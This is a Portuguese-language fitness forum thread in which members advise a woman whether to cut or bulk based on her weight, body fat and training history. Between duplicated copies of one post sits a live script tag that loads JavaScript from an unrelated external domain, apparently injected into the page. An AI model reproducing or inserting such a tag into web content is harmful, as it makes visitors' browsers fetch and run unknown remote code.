Ir para conteúdo
  • Cadastre-se

[Oficial] Devo Fazer Cutting ou Bulking? Poste sua foto!


Hipertrofia.org

Posts Recomendados

Acho que vai muito da sua preferencia, tá bem entre os dois termos. Se tu prefere estar mais magrinha, vai no cutting. Se está se sentindo pequena ainda, continua no bulking leve. Enfim, vai estar bem de qualquer maneira

Obrigada, Mauricio. :laughingsmiley:

Acho que vc devia aproveitar que tem o corpo magro e bem desenhado e emagrecer pra definir, deixar mais durinho :).

Estava pensando em definir um pouco mesmo.

priscila depende , qual estilo de shape que voce gosta , mais magrinha ou cavalona ?

eu iria de clean bulking ,as coxas estao com pouca massa magra, da pra ganhar bastante ainda , porem voce ta com shape bom

Monster, eu ainda não sei qual estilo prefiro, mas considero que tenho um corpo misto.. Cintura mais delicada e bunda grande (cavalona não é a palavra certa haha).

É, eu falei com meu instrutor hoje pra me passar um treino mais hard. Pra perna e tal. Vamos ver como fica. Vou fazer um cutt rápido, pra perder a gordura abdominal muito bem observada pelo Gus hehe e depois entrar em bulk novamente. Será o primeiro cutt, isso me deixa animada. :thumbsup_anim:

Link para o comentário
Compartilhar em outros sites

Publicidade

- Treino há 1 ano e 5 meses.

- Tenho 1,69, 65,5kg e bf 20% aproximadamente.

- Queria saber se continuo em bulk ou faço um cutt (ambos naturais,

porque não tenho interesse em competição, treino porque gosto).

10476469_340639009466866_105062183706318

baixa pra 16% depois volta pro bulk limpo

Link para o comentário
Compartilhar em outros sites

<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>

- Treino há 1 ano e 5 meses.

- Tenho 1,69, 65,5kg e bf 20% aproximadamente.

- Queria saber se continuo em bulk ou faço um cutt (ambos naturais,

porque não tenho interesse em competição, treino porque gosto).

10476469_340639009466866_105062183706318

Seu corpo já é muito bonito mas um cutting leve como o Maurice disse, mais seco, ficaria melhor ainda.

Depois volta pro bulking, sempre limpo pra controlar a gordura.

Link para o comentário
Compartilhar em outros sites

Obrigada, rvtz e Gus. Eu peguei umas dicas de cutt com o Maurice, porque ele é bom nessas coisas, tem diário e tudo. Comecei hoje, mudei um pouco o treino (estava precisando mudar mesmo), adicionei o agachamento livre (nunca tinha feito nesse 1 ano e meio que treino) e outras coisas que me deixaram sem conseguir andar direito. E coloquei um HIIT pela manhã antes da universidade. Vamos ver, vou fazer bem direitinho.

Vitor, eu recomendo que faça cutt porque quero gente pra sofrer comigo. Brincadeira, eu não sei opinar nesse seu caso.

Link para o comentário
Compartilhar em outros sites

  • busarello mudou o título para BULKING C/Gordura LOCALIZADA
  • busarello trancou este tópico
  • busarello fechou este tópico

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...